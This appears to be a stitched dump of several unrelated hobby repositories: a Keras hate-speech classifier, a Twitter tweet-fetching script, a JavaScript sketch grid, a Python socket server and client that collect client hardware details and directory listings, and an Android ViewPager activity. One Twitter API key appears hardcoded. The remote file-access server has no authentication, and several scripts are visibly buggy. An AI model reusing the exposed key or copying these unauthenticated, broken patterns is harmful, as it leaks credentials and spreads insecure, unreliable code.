sentence_words = X_s[i].lower().split()
j = 0
for w in sentence_words:
if j < max_len and w in word_to_index:
X_indices[i, j] = word_to_index[w]
j = j + 1
### END CODE HERE ###
return X_indices
def get_embedding(word):
# return
try:
return word2vec_model[word]
except Exception as e:
return np.zeros(EMBEDDING_DIM)
def get_embedding_weights():
embedding = np.zeros((len(vocab) + 1, EMBEDDING_DIM))
n = 0
for k, v in vocab.items():
try:
embedding[v] = word2vec_model[k]
except:
n += 1
pass
return embedding
def select_tweets():
# selects the tweets as in mean_glove_embedding method
# Processing
tweets = get_data()
X, Y = [], []
tweet_return = []
for tweet in tweets:
_emb = 0
words = TOKENIZER(tweet['text'].lower())
for w in words:
if w in word2vec_model: # Check if embeeding there in GLove model
_emb += 1
if _emb: # Not a blank tweet
tweet_return.append(tweet)
# pdb.set_trace()
return tweet_return
def gen_vocab(tweets):
# Processing
vocab_index = 1
for tweet in tweets:
text = TOKENIZER(tweet.lower())
text = ' '.join([c for c in text if c not in punctuation])
words = text.split()
#words = [word for word in words if word not in STOPWORDS]
#print(words)
for word in words:
if word not in vocab:
vocab[word] = vocab_index
reverse_vocab[vocab_index] = word # generate reverse vocab as well
vocab_index += 1
freq[word] += 1
vocab['UNK'] = len(vocab) + 1
vocab['bsss'] = len(vocab) + 2
reverse_vocab[len(vocab)] = 'UNK'
reverse_vocab[len(vocab) + 1] = 'bsss'
def filter_vocab(k):
global freq, vocab
pdb.set_trace()
freq_sorted = sorted(freq.items(), key=operator.itemgetter(1))
tokens = freq_sorted[:k]
vocab = dict(zip(tokens, range(1, len(tokens) + 1)))
vocab['UNK'] = len(vocab) + 1
def gen_sequence(tweets, y):
X = []
for tweet in tweets:
text = TOKENIZER(tweet.lower())
text = ' '.join([c for c in text if c not in punctuation])
words = text.split()
# words = [word for word in words if word not in STOPWORDS]
seq, _emb = [], []
for word in words:
if word in word_to_index:
seq.append(word_to_index[word])
X.append(seq)
return X, y
def shuffle_weights(model):
weights = model.get_weights()
weights = [np.random.permutation(w.flat).reshape(w.shape) for w in weights]
model.set_weights(weights)
def lstm_model(sequence_length, embedding_dim):
model_variation = 'LSTM'
print('Model variation is %s' % model_variation)
sentence_indices = Input(shape=sequence_length, dtype='int32')
seq = Sequential()
embeddings = Embedding(len(vocab) + 2, embedding_dim, input_length=sequence_length[0], trainable=LEARN_EMBEDDINGS)
embedding_layer = pretrained_embedding_layer(word_to_vec_map, word_to_index)
embeddings = embedding_layer(sentence_indices)
X = Bidirectional(LSTM(64, return_sequences=True), input_shape=sequence_length)(embeddings)
X = Dropout(0.5)(X)
# X = Bidirectional(LSTM(64, return_sequences=False), input_shape=sequence_length)(X)
attention = Dense(1, activation='tanh')(X)
attention = Flatten()(attention)
attention = Activation('softmax')(attention)
attention = RepeatVector(128)(attention)
attention = Permute([2, 1])(attention)
sent_representation = merge.Multiply()([X, attention])
sent_representation = Lambda(lambda xin: K.sum(xin, axis=1))(sent_representation)
X = Dropout(0.5)(sent_representation)
X = Dense(2, activation='softmax')(X)
X = Activation('softmax')(X)
model_lstm = Model(inputs=sentence_indices, outputs=X)
model_lstm.compile(loss=LOSS_FUN, optimizer=OPTIMIZER, metrics=['accuracy'])
print(model_lstm.summary())
return model_lstm
def train_LSTM(X, y, model, inp_dim, weights, epochs=EPOCHS, batch_size=BATCH_SIZE):
cv_object = KFold(n_splits=NO_OF_FOLDS, shuffle=True, random_state=42)
p, r, f1 = 0., 0., 0.
p1, r1, f11 = 0., 0., 0.
sentence_len = X.shape[1]
print(NO_OF_FOLDS)
for train_index, test_index in cv_object.split(X):
if INITIALIZE_WEIGHTS_WITH == "glove":
model.layers[1].set_weights([weights])
elif INITIALIZE_WEIGHTS_WITH == "random":
shuffle_weights(model)
else:
return
X_train, y_train = X[train_index], y[train_index]
X_test, y_test = X[test_index], y[test_index]
y_train = y_train.reshape((len(y_train), 1))
X_temp = np.hstack((X_train, y_train))
for epoch in range(epochs):
for X_batch in batch_gen(X_temp, batch_size):
x = X_batch[:, :sentence_len]
y_temp = X_batch[:, sentence_len]
class_weights = None
if SCALE_LOSS_FUN:
class_weights = {}
class_weights[0] = np.where(y_temp == 0)[0].shape[0] / float(len(y_temp))
class_weights[1] = np.where(y_temp == 1)[0].shape[0] / float(len(y_temp))
try:
y_temp = convert_to_one_hot(y_temp, C=2)
except Exception as e:
print(e)
print(y_temp)
# print(x.shape)
# print(y_temp.shape)
# print("HERE WE GO")
loss, acc = model.train_on_batch(x, y_temp, class_weight=class_weights)
y_pred = model.predict_on_batch(X_test)
y_pred = np.argmax(y_pred, axis=1)
print(classification_report(y_test, y_pred))
print(precision_recall_fscore_support(y_test, y_pred))
print(y_pred)
p += precision_score(y_test, y_pred, average='weighted')
p1 += precision_score(y_test, y_pred, average='micro')
r += recall_score(y_test, y_pred, average='weighted')
r1 += recall_score(y_test, y_pred, average='micro')
f1 += f1_score(y_test, y_pred, average='weighted')
f11 += f1_score(y_test, y_pred, average='micro')
print("macro results are")
print("average precision is " + str(p / NO_OF_FOLDS))
print("average recall is " + str(r / NO_OF_FOLDS))
print("average f1 is " + str(f1 / NO_OF_FOLDS))
print("micro results are")
print("average precision is " + str(p1 / NO_OF_FOLDS))
print("average recall is " + str(r1 / NO_OF_FOLDS))
print("average f1 is " + str(f11 / NO_OF_FOLDS))
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='LSTM based models for twitter Hate speech detection')
parser.add_argument('-f', '--embeddingfile', required=True)
parser.add_argument('-d', '--dimension', required=True)
parser.add_argument('--tokenizer', choices=['glove', 'nltk'], required=True)
parser.add_argument('--loss', default=LOSS_FUN, required=True)
parser.add_argument('--optimizer', default=OPTIMIZER, required=True)
parser.add_argument('--epochs', default=EPOCHS, required=True)
parser.add_argument('--batch-size', default=BATCH_SIZE, required=True)
parser.add_argument('-s', '--seed', default=SEED)
parser.add_argument('--folds', default=NO_OF_FOLDS)
parser.add_argument('--kernel', default=KERNEL)
parser.add_argument('--class_weight')
parser.add_argument('--initialize-weights', choices=['random', 'glove'], required=True)
parser.add_argument('--learn-embeddings', action='store_true', default=False)
parser.add_argument('--scale-loss-function', action='store_true', default=False)
args = parser.parse_args()
GLOVE_MODEL_FILE = str(args.embeddingfile)
EMBEDDING_DIM = int(args.dimension)
SEED = int(args.seed)
NO_OF_FOLDS = int(args.folds)
CLASS_WEIGHT = args.class_weight
LOSS_FUN = args.loss
OPTIMIZER = args.optimizer
KERNEL = args.kernel
if args.tokenizer == "glove":
TOKENIZER = glove_tokenize
elif args.tokenizer == "nltk":
TOKENIZER = tokenize_nltk.casual.TweetTokenizer(strip_handles=True, reduce_len=True).tokenize
INITIALIZE_WEIGHTS_WITH = args.initialize_weights
LEARN_EMBEDDINGS = args.learn_embeddings
EPOCHS = int(args.epochs)
BATCH_SIZE = int(args.batch_size)
SCALE_LOSS_FUN = args.scale_loss_function
np.random.seed(SEED)
print('GLOVE embedding: ' + str(GLOVE_MODEL_FILE))
print('Embedding Dimension: ' + str(int(EMBEDDING_DIM)))
print('Allowing embedding learning: ' + str(LEARN_EMBEDDINGS))
word_to_index, index_to_word, word_to_vec_map = read_glove_vecs('data/glove.6B.50d2.txt')
word2vec_model = word_to_vec_map.copy()
X_tweets, y = read_csv('data/SD_dataset_FINAL.csv')
print(np.array(word_to_vec_map.keys()).shape)
# gen_vocab(X_tweets)
vocab = word_to_index.copy()
reverse_vocab = index_to_word.copy()
vocab['UNK'] = len(vocab) + 1
print(len(vocab))
reverse_vocab[len(vocab)] = 'UNK'
X, y = gen_sequence(X_tweets, y)
MAX_SEQUENCE_LENGTH = max(map(lambda x: len(x), X))
print("max seq length is " + str(MAX_SEQUENCE_LENGTH))
data = pad_sequences(X, maxlen=MAX_SEQUENCE_LENGTH)
y = np.array(y)
data, y = shuffle(data, y)
W = get_embedding_weights()
# print(data.shape[1])
model = lstm_model((data.shape[1],), EMBEDDING_DIM)
# model = lstm_model(data.shape[1], 25, get_embedding_weights())
# y_oh = convert_to_one_hot(y, C=2)
# print(data)
# print(y)
# print(data.shape)
# print(y.shape)
train_LSTM(data, y, model, EMBEDDING_DIM, W)
X_train, X_test, y_train, y_test = train_test_split(data, y, test_size=0.2, random_state=np.random)
# maxLen = MAX_SEQUENCE_LENGTH
# print(X_train)
# print(X_train.shape)
# X_train_indices = sentences_to_indices(X_train, word_to_index, maxLen)
y_train_oh = convert_to_one_hot(y_train, C=2)
# print(np.array(X_train).shape)
# print(y_train_oh.shape)
# model.fit(X_train, y_train_oh, epochs=EPOCHS, batch_size=BATCH_SIZE, shuffle=True)
y_test_oh = convert_to_one_hot(y_test, C=2)
loss, acc = model.evaluate(X_test, y_test_oh)
pred = model.predict(X_test)
table = model.layers[1].get_weights()[0]
print(acc)
print(table)
print(np.array(table).shape)
np.save('lstm_embed.npy', np.array(table))
f_vocab = open('vocab_text', 'w')
json.dump(f_vocab, 'vocab_text')
pdb.set_trace()
<file_sep>/twitterBESexistExtract.py
import collections
import math
import sys
import twitter
import pandas as pd
import numpy as np
import time
c_k = 'oPbv9rsGgmsh3E0vfN4apXJC5'
c_sk = '<KEY>'
a_t_k = '<KEY>'
a_t_sk = '<KEY>'
raw_data_loc = 'hostile_sexist.tsv'
api = twitter.Api(consumer_key=c_k,
consumer_secret=c_sk,
access_token_key=a_t_k,
access_token_secret=a_t_sk,
sleep_on_rate_limit=True)
tID_raw = pd.read_csv(raw_data_loc, sep='\t')
tID_raw['label'] = '0'
N, C = tID_raw.shape
tID_text = tID_raw.values
print(C)
print(tID_text)
tID_text_toReplace = tID_text.copy()
i = 0
for id, label in tID_text:
if label != 'racism' and label != 1:
print(id)
id = int(id)
tweet = ''
try:
tweet = api.GetStatus(id).text
except twitter.error.TwitterError as e:
print(str(e))
tweet = 'error in fetching'
tID_text_toReplace[i, 0] = tweet
tID_text_toReplace[i, 1] = 1
pd.DataFrame(tID_text_toReplace).to_csv('HS_dataset_withText.csv')
elif label != 0 or label != 1:
tID_text_toReplace[i, 2] = 'NA'
i += 1
# time.sleep(0.5)
print(i)
print("Test status: " + str(api.GetStatus('572342978255048705').text))<file_sep>/nn_classifier.py
from data_handler import get_data
import sys
import pandas as pd
import numpy as np
from keras.preprocessing.sequence import pad_sequences
import pdb, json
from sklearn.metrics import make_scorer, f1_score, accuracy_score, recall_score, precision_score, classification_report, precision_recall_fscore_support
from sklearn.ensemble import GradientBoostingClassifier, RandomForestClassifier
from sklearn.model_selection import cross_val_score, cross_val_predict
from sklearn.feature_extraction.text import TfidfVectorizer
import pdb
from sklearn.metrics import make_scorer, f1_score, accuracy_score, recall_score, precision_score, classification_report, precision_recall_fscore_support
from sklearn.ensemble import GradientBoostingClassifier, RandomForestClassifier
from sklearn.svm import SVC, LinearSVC
from sklearn.model_selection import KFold
from sklearn.linear_model import LogisticRegression
from sklearn.utils import shuffle
import codecs
import operator
import sklearn
from collections import defaultdict
from batch_gen import batch_gen
from my_tokenizer import glove_tokenize
import xgboost as xgb
# logistic, gradient_boosting, random_forest, svm, tfidf_svm_linear, tfidf_svm_rbf
model_count = 2
word_embed_size = 200
GLOVE_MODEL_FILE = str(sys.argv[1])
EMBEDDING_DIM = int(sys.argv[2])
MODEL_TYPE = sys.argv[3]
print('Embedding Dimension: %d' % EMBEDDING_DIM)
print('GloVe Embedding: %s' % GLOVE_MODEL_FILE)
word2vec_model1 = np.load('lstm_embed.npy')
print(word2vec_model1.shape)
word2vec_model1 = word2vec_model1.reshape((word2vec_model1.shape[0], word2vec_model1.shape[1]))
f_vocab = open('vocab_text', 'r')
vocab = json.load(f_vocab)
word2vec_model = {}
for k,v in vocab.iteritems():
word2vec_model[k] = word2vec_model1[int(v)]
del word2vec_model1
SEED = 42
MAX_NB_WORDS = None
VALIDATION_SPLIT = 0.2
# vocab generation
vocab, reverse_vocab = {}, {}
freq = defaultdict(int)
tweets = {}
def select_tweets_whose_embedding_exists():
# selects the tweets as in mean_glove_embedding method
# Processing
X, y = pd.read_csv('data/SD_dataset_FINAL.csv')
return X
def gen_data():
X, y = pd.read_csv('data/SD_dataset_FINAL.csv')
X_e = []
for s in X:
words = glove_tokenize(s)
emb = np.zeros(word_embed_size)
for word in words:
try:
emb += word2vec_model[word]
except:
pass
emb /= len(words)
X_e.append(emb)
return X_e, y
def get_model(m_type=None):
if not m_type:
print('ERROR: Please provide a valid method name')
return None
if m_type == 'logistic':
logreg = LogisticRegression()
elif m_type == "gradient_boosting":
#logreg = GradientBoostingClassifier(n_estimators=10)
logreg = xgb.XGBClassifier(nthread=-1)
elif m_type == "random_forest":
logreg = RandomForestClassifier(n_estimators=100, n_jobs=-1)
elif m_type == "svm_rbf":
logreg = SVC(class_weight="balanced", kernel='rbf')
elif m_type == "svm_linear":
logreg = LinearSVC(class_weight="balanced")
else:
print("ERROR: Please specify a correst model")
return None
return logreg
def classification_model(X, Y, model_type="logistic"):
NO_OF_FOLDS=10
MAX_SEQUENCE_LENGTH = max(map(lambda x: len(x), X))
X = pad_sequences(X, maxlen=MAX_SEQUENCE_LENGTH)
y = np.array(Y)
X, y = shuffle(X, y)
print("Model Type: " + str(model_type))
#predictions = cross_val_predict(logreg, X, Y, cv=NO_OF_FOLDS)
scores1 = cross_val_score(get_model(model_type), X, Y, cv=NO_OF_FOLDS, scoring='precision_weighted')
print("Precision(avg): %0.3f (+/- %0.3f)") % (scores1.mean(), scores1.std() * 2)
scores2 = cross_val_score(get_model(model_type), X, Y, cv=NO_OF_FOLDS, scoring='recall_weighted')
print("Recall(avg): %0.3f (+/- %0.3f)") % (scores2.mean(), scores2.std() * 2)
scores3 = cross_val_score(get_model(model_type), X, Y, cv=NO_OF_FOLDS, scoring='f1_weighted')
print("F1-score(avg): %0.3f (+/- %0.3f)") % (scores3.mean(), scores3.std() * 2)
pdb.set_trace()
if __name__ == "__main__":
X, Y = pd.read_csv('data/SD_dataset_FINAL.csv')
classification_model(X, Y, MODEL_TYPE)
pdb.set_trace()
|
3f7bf363e65aca3394004517d18103ed72cb47eb
|
[
"Markdown",
"Python",
"Text"
] | 9 |
Python
|
JaquJaqu/Automatic_Detection_of_Sexist_Statements_Commonly_Used_at_the_Workplace
|
96e2db32557f6b33bce7981674530477f0381854
|
15308ff063e4b5233219dd987b54b45774f7f18a
|
refs/heads/master
|
<file_sep>const gridLayer = document.querySelector('#container');
let grid = [];
function clearGrid(){
let gridLength = grid.length;
for (let i=0; i< gridLength; i++){
grid[i].classList.remove('gridHovered');
}
}
// Delete grid function
function deleteGrid(){
while (gridLayer.firstChild) {
container.removeChild(gridLayer.firstChild)};
grid.length = 0;
}
function askPlayer(){
let playerSquare;
deleteGrid();
do {
playerSquare = prompt("How many squares per side would you like to have ? ");
}
while(playerSquare > 64);
gridArray(Number(playerSquare));
}
function gridArray(gridsize){
let gridSizeLength = Number(gridsize),
gridTotal = gridSizeLength * gridSizeLength,
gridWidthCalc = 0;
gridWidthCalc = ( 100 / gridSizeLength );
document.documentElement.style.setProperty(`--grid-width`, gridWidthCalc + "%");
for ( let i=0; i < gridTotal ; i++ )
{
grid[i] = document.createElement('div');
grid[i].classList.add('gridDiv');
gridLayer.appendChild(grid[i]);
grid[i].addEventListener('mouseover', function (){
grid[i].classList.add('gridHovered');
});
};
console.log(grid);
}
gridArray(16);
|
d62f39a1f2733efe89c125d2945efbc6fa119353
|
[
"JavaScript"
] | 1 |
JavaScript
|
touchnit/OdinEtchASketch
|
3f2b9d29c418ab76a85a327444995e59dda99ca5
|
43ee2b4f0c73eeb32241b649d69fdfde046ae74d
|
refs/heads/master
|
<repo_name>nikrosss/client-server<file_sep>/CuiCat2.py
import socket
import base64
import threading
def dir():
print ("передаем нужный нам каталог")
Prosmotr_cat_why1 = b"" + str.encode(Prosmotr_cat_why)
print(Prosmotr_cat_why1)
conn.send(Prosmotr_cat_why1)
print ("начали принимать фаил c каталогом")
fil = open('catalog.txt', 'wb')
data1 = conn.recv(1024)
# data1 = data1.decode()
print ("приняли содержимое: ")
fil.write(data1)
fil.close()
print ("Сохранили содержимое каталога")
Prosmotr_cat_open = open('Prosmotr_cat.txt', 'w')
Prosmotr_cat_open.write("False\n" + Prosmotr_cat_why)
while True:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(("",14903))
sock.listen(10)
conn, addr = sock.accept()
print(addr[0])
data = conn.recv(1024)
print (data)
udata = base64.b64decode(data)
udata = udata.decode("utf-8")
print ("Data: " + udata)
if udata == "ping":
print("нас спросили про каталоги")
Prosmotr_cat_open = open('Prosmotr_cat.txt', 'r')
Prosmotr_cat_a = [a.strip() for a in Prosmotr_cat_open.readlines()] # Удаляем спец ссимволы конца строки
if len(Prosmotr_cat_a)>=2:
Prosmotr_cat = Prosmotr_cat_a[0] # извлекаем ссылку из списка строк
Prosmotr_cat_why = Prosmotr_cat_a[1]
Prosmotr_cat_open.close()
if Prosmotr_cat == "True":
if len(Prosmotr_cat_why) != 0:
print (Prosmotr_cat)
print (Prosmotr_cat_why)
yas=str.encode("yas")
yas=base64.b64encode(yas)
conn.send(yas)
threading.Thread(target=dir).start()
else:
no=str.encode("no")
no=base64.b64encode(no)
conn.send(no)
if Prosmotr_cat == "False":
no=str.encode("no")
no=base64.b64encode(no)
conn.send(no)
else:
no=str.encode("no")
no=base64.b64encode(no)
conn.send(no)
# комментарий<file_sep>/GuiServer.py
from tkinter import *
from tkinter import ttk
import tkinter.messagebox
import time
#import socket
import os
import sqlite3
import threading
#Создаем окно программы
class Application(Frame):
def __init__(self, master):
super(Application, self).__init__(master)
self.grid()
self.place()
self.create_w()
#Создаем и размещаем элементы окна
def create_w(self):
# Меню
menu = Menu(self.master)
self.master.config(menu=menu)
file = Menu(menu)
file.add_command(label='Открыть', )
file.add_command(label='Закрыть', )
menu.add_cascade(label = 'Файл', menu = file)
modul = Menu(menu)
modul.add_command(label='Диспетчер файлов',)
modul.add_command(label='Все клиенты',)
menu.add_cascade(label = 'Модули', menu = modul)
# Блок надписей
self.lb1=Label(self, text="Клиенты со статусом ")
self.lb1.grid(row=0, column=0, columnspan=1, sticky=W)
self.lb2=Label(self, text="online")
self.lb2.grid(row=0, column=1, columnspan=1, sticky=W)
# self.lb3=Label(self, text='client1')
# self.lb3.grid(row=1, column=0, columnspan=1, sticky=W)
# self.lb4=Label(self, text='status1')
# self.lb4.grid(row=1, column=1, columnspan=1, sticky=W)
# self.lb5=Label(self, text=' ffff')
# self.lb5.grid(row=3, column=0, columnspan=7, sticky=W)
#Блок кнпок
self.bt1 = Button(self, bd=2, text = "Подробности о клиенте", command=self.info)
self.bt1.grid(row=2, column =2)
self.bt2 = Button(self, bd=2, text = "Запустить файловый модуль", command=self.link_open)
self.bt2.grid(row=2, column =0)
self.bt2 = Button(self, bd=2, text = "Запретить соединение", command=self.link_close)
self.bt2.grid(row=2, column =4)
# self.bt3 = Button(self, bd=2, text = "Проверить статус", command=self.status)
# self.bt3.grid(row=1, column =3)
# Листбокс
self.listbox1=Listbox(self, height = 20, width =35, bd=3, selectmod=SINGLE)
threading.Thread(target=self.Online).start()
self.listbox1.grid(row=1, column=0, columnspan = 2)
def info (self):
if len(self.listbox1.curselection()) != 0:
select = self.listbox1.get(self.listbox1.curselection())
print(select)
select_a = select[0]
print(select_a)
select_b = open((os.path.join(os.getcwd(),str(select_a), 'iron.txt')), 'r')
a = select_b.readlines()
tkinter.messagebox.showinfo('Характеристики клиента', a)
select_b.close()
# der = open('save_inf_client.txt', 'r')
# a = der.readlines()
# self.lb5["text"] = str(a)
# print (a)
# der.close()
def link_open (self):
conn_sql = sqlite3.connect("test.sqlite3")
curs = conn_sql.cursor()
if len(self.listbox1.curselection()) != 0:
select = self.listbox1.get(self.listbox1.curselection())
print(select)
select_a = select[0]
curs.execute("update Configs set catl ='True' where PersonID =" + str(select_a))
conn_sql.commit()
print("Можно запускать файловый менеджер")
curs.close()
conn_sql.close()
else:
print("Вы ничего не выбрали")
def link_close (self):
file = open("count_s.txt", 'w')
file.write('1')
file.close()
def status(self):
status_clienta=open('status.txt', 'r')
b1=[a.strip() for a in status_clienta.readlines()]
b=b1[0]
b2=b.split(' ')
if b2[0] == "ping":
self.lb4["text"] = "on line"
else :
self.lb4["text"] = "off line"
b=b1[0]
b2=b.split(' ')
client1 = b2[1]
status_clienta.close()
status_clienta_del=open('status.txt', 'w')
status_clienta_del.write(client1)
status_clienta_del.close()
def Online(self):
conn_sql1 = sqlite3.connect("test.sqlite3")
curs1 = conn_sql1.cursor()
self.listbox1.delete
status = 0
while status ==0:
self.listbox1.delete(0, END)
for der in curs1.execute("SELECT PersonID, NetvorcName, ipAdres, MetaName from Persons where status = 'online'"):
self.listbox1.insert(END, der)
print(der)
time.sleep(30)
curs1.close()
conn_sql1.close()
root = Tk()
root.title("Server 0.7")
root.geometry("700x600")
app = Application(root)
vb=0
root.mainloop()<file_sep>/server3.py
import time
import socket
import threading
import sqlite3
import os
import base64
#file = open('count_s.txt', 'r')
#count_a = [a.strip() for a in file.readlines()] # Удаляем спец ссимволы конца строки
#count = count_a[0] # извлекаем ссылку из списка строк
#file.close()
#print (count)
print ("Сервер ожил")
# Функция принятия изображений. Открывает порт 14901
#эта же функция принимает и все остальные файлы
def pic ():
print ("начали принимать фаил")
pic_con = socket.socket()
pic_con.bind(("",14901))
pic_con.listen(2)
conn1, addr1 = pic_con.accept()
conn_sql1 = sqlite3.connect("test.sqlite3")
curs1 = conn_sql1.cursor()
ip_adr1=addr1[0]
curs1.execute("SELECT PersonID from Persons where IpAdres ='%s'" % ip_adr1)
c1=curs1.fetchone()
print(c1)
print(os.path.join(os.getcwd(),str(c1[0]),str(udata1)))
pich = open((os.path.join(os.getcwd(),str(c1[0]),str(udata1))), 'wb')
while 1:
data1 = conn1.recv(1024)
data1=base64.b64decode(data1)
print(data1)
pich.write(data1)
if not data1 :
break
pich.close()
conn1.close()
curs1.close()
conn_sql1.close()
def dir():
print ("передаем нужный нам каталог")
Prosmotr_cat_why1 = b"" + str.encode(Prosmotr_cat_why)
print(Prosmotr_cat_why1)
conn.send(Prosmotr_cat_why1)
print ("начали принимать фаил c каталогом")
fil = open('catalog.txt', 'wb')
data1 = conn.recv(1024)
# data1 = data1.decode()
print ("приняли содержимое: ")
fil.write(data1)
fil.close()
print ("Сохранили содержимое каталога")
Prosmotr_cat_open = open('Prosmotr_cat.txt', 'w')
Prosmotr_cat_open.write("False\n" + Prosmotr_cat_why)
# Основной цикл программы. Открывает порт 14900 и читает с него данные. Дале кодирует в UTF-8
start = True
while start == True:
print("Ждем входные данные")
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(("",14900))
sock.listen(10)
conn, addr = sock.accept()
print(addr[0])
data = conn.recv(1024)
print (data)
udata = data.decode("utf-8")
print ("Data: " + udata)
name_pic = udata.split(".")
name_pic2 = len(name_pic)
print ("Длинна списка: ", name_pic2, )
#Механизм генерации ID нового клиента
if udata[0:7] == "null_id":
conn_sql = sqlite3.connect("test.sqlite3")
curs = conn_sql.cursor()
#Прежде чем генерить новый, проверяем по IP старые ID
ip_adr=addr[0]
curs.execute("SELECT PersonID from Persons where IpAdres ='%s'" % ip_adr)
c=curs.fetchone()
print(c)
#Если IP не нашли - генерируем нового клиента
# ELSE - отпрвляем сущетвующий ID
if c ==None:
curs.execute('select * from Count_clientt')
count_cl = curs.fetchone()
print("ID нового клиента: " + str(count_cl[0]))
new_count_cl = count_cl[0]+1
new_count_cl_str=str(new_count_cl)
print("Поднмаем счетчик до :"+ str(new_count_cl))
#Обновляем счетчик клиентов
curs.execute('update Count_clientt set count =' + str(new_count_cl))
os.mkdir(str(count_cl[0]),)
print("Создали каталог клиента: "+ str(count_cl[0]))
sysdate=time.asctime()
# Сетим в БД данные и новые конфиги
insert_sql=[(str(count_cl[0]), 'null' ,addr[0], str(sysdate), 'не задано', 'online')]
curs.executemany('insert INTO Persons values (?, ?, ?, ?,? ,?)', insert_sql)
conf = [(str(count_cl[0]), 'False' , 'False')]
curs.executemany('insert INTO Configs values (?, ?,?)', conf)
conn_sql.commit()
print("закомитили")
curs.close()
conn_sql.close()
id=str.encode(str(count_cl[0]))
conn.send(id)
print("пульнули id клиенту")
else:
print("Отправляем найденый ID из БД")
id=str.encode(str(c[0]))
sysdate=time.asctime()
curs.execute("update Persons set OnlineDate ='%s'" % str(sysdate) +"where PersonID ='%s'" % c[0])
conn_sql.commit()
conn_sql.close()
conn.send(id)
#из-за проблем передачи русского текста приняие характеристик сделано как принятие файла.
if int(name_pic2) ==2 and name_pic[0]=="iron":
name_pic1 = name_pic[0]+"."+name_pic[1]
udata1=udata
threading.Thread(target=pic).start()
# data_pic = pic()
if int(name_pic2)==2 and name_pic[0]=="my_id":
print("Коиент вышел в сеть, обновляем данные: ip")
conn_sql = sqlite3.connect("test.sqlite3")
curs = conn_sql.cursor()
ip_adr=addr[0]
curs.execute("update Persons set IpAdres='%s'" % ip_adr +"where PersonID ='%s'" % name_pic[1])
print("Обновили данные")
conn_sql.commit()
curs.close()
conn_sql.close()
if udata[0:5] == "param":
print("Клиент запросил настройки")
conn_sql = sqlite3.connect("test.sqlite3")
curs = conn_sql.cursor()
#ищем ID по IP
ip_adr=addr[0]
curs.execute("SELECT PersonID from Persons where IpAdres ='%s'" % ip_adr)
c=curs.fetchone()
# По найденному ID ищем нужно ли отправлять конфиги
curs.execute("SELECT UnloudConfig, catl from Configs where PersonID ='%s'" % str(c[0]))
new_sit_a = curs.fetchone()
# Обновляем время отнайн
sysdate=time.asctime()
curs.execute("update Persons set OnlineDate='%s'" % str(sysdate) +",status='online' where IpAdres ='%s'" % ip_adr)
curs.close()
conn_sql.close()
print ("Новые настройки: "+ new_sit_a[0])
print ("Работа с файлами: "+ new_sit_a[1])
if new_sit_a[1] == 'True':
otvet = str.encode("catl")
conn.send(otvet)
print("отправили ", otvet)
conn_sql = sqlite3.connect("test.sqlite3")
curs = conn_sql.cursor()
curs.execute("update Configs set catl ='False' where PersonID =" + str(c[0]))
conn_sql.commit()
print("Сбросили конфиг")
curs.close()
conn_sql.close()
if new_sit_a[0] == 'True':
otvet = str.encode("yas")
conn.send(otvet)
print("отправили ", otvet)
time.sleep(1)
print (os.path.join(os.getcwd(), str(c[0]),'Param.txt'))
ReParam = open((os.path.join(os.getcwd(), str(c[0]),'Param.txt')), 'rb')
ReParam = ReParam.read(1024)
conn.send(ReParam)
conn_sql = sqlite3.connect("test.sqlite3")
curs = conn_sql.cursor()
curs.execute("update Configs set UnloudConfig ='False' where PersonID ='%s'" % str(c[0]))
conn_sql.commit()
conn_sql.close()
if new_sit_a[0] == 'False':
otvet = str.encode("False")
conn.send(otvet)
print("отправили ", otvet)
# старый метод, теперь принимаем файлом
if udata[0:14] == "haracteristics":
save=open("save_inf_client.txt", 'w')
save.write(str(udata))
save.close()
print("Полученные данные обработаны")
|
413c53231399970f2233e26d186b89df0fdc2eba
|
[
"Python"
] | 3 |
Python
|
nikrosss/client-server
|
e0df0fbb0aaab8c0920f59c2aef9385d8faaa3b8
|
67b3d1a55af7d54a6cfcc1141f77a9ed41e8cbbd
|
refs/heads/master
|
<repo_name>wumanrou/pageswitcher<file_sep>/src/com/example/dividescreen/MainActivity.java
package com.example.dividescreen;
import java.util.ArrayList;
import java.util.List;
import android.os.Bundle;
import android.app.Activity;
import android.support.v4.view.PagerAdapter;
import android.support.v4.view.PagerTabStrip;
import android.support.v4.view.ViewPager;
import android.support.v4.view.ViewPager.OnPageChangeListener;
import android.view.Menu;
import android.view.View;
import android.view.View.OnClickListener;
import android.view.ViewGroup;
import android.view.WindowManager;
import android.widget.ImageView;
import android.widget.LinearLayout;
public class MainActivity extends Activity {
private ViewPager mViewPager;//存放多个页面的控件
private PagerTabStrip mTab;//页面选项卡
private LinearLayout mImgs;//存放底部图片的线性布局
private int[] layouts=new int[]{R.layout.framelayouttest,R.layout.texteditor,R.layout.textvieweffect};//多个页面的布局文件
private String[] titles=new String[]{"霓虹灯","文字","文字效果"};
private ImageView[] mImgViews=new ImageView[layouts.length];
private List<View>views=new ArrayList<View>();//存放所有页面的集合
private List<String>pagerTitles=new ArrayList<String>();//存放所有标题的集合
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
getWindow().setFlags(WindowManager.LayoutParams.FLAG_FULLSCREEN, WindowManager.LayoutParams.FLAG_FULLSCREEN);//设置屏幕为全屏显示
setContentView(R.layout.activity_main);
mImgs=(LinearLayout)findViewById(R.id.mImgs);//根据ID获取相应的控件
mViewPager=(ViewPager)findViewById(R.id.mViewPager);
mTab=(PagerTabStrip)findViewById(R.id.mTabr);
//设置选项卡之间的边距,默认情况下在一个页面中可以看见多个选项卡
mTab.setTextSpacing(300);
init();//执行初始化操作
mViewPager.setAdapter(new MyPagerAdapter());//为ViewPager控件添加适配器
initImg();//初始化显示的图片
//为ViewPager控件添加页面变换事件监听器
mViewPager.setOnPageChangeListener(new MyPageChangeListener());
}
//自定义页面变换时间监听器
private class MyPageChangeListener implements OnPageChangeListener{
public void onPageScrollStateChanged(int arg0){
}
public void onPageScrolled(int arg0,float arg1,int arg2){
}
public void onPageSelected(int selected){//显示的页面发生变化
resetImg();//重置底部显示的图片
//将当前页面对应的图片设置为红色
mImgViews[selected].setImageResource(R.drawable.choosed);
}
}
//自定义PageAdapter类,该类用于封装需要切换的多个页面
private class MyPagerAdapter extends PagerAdapter{
public int getCount(){//该方法返回所包含页面的个数
return views.size();
}
public boolean isViewFromObject(View arg0,Object arg1){
return arg0==arg1;
}
public CharSequence getPageTitle(int position){//该方法用于返回页面的标题
return pagerTitles.get(position);
}
//该方法用于初始化指定的页面
public Object instantiateItem(ViewGroup container,int position){
((ViewPager)container).addView(views.get(position));
return views.get(position);
}
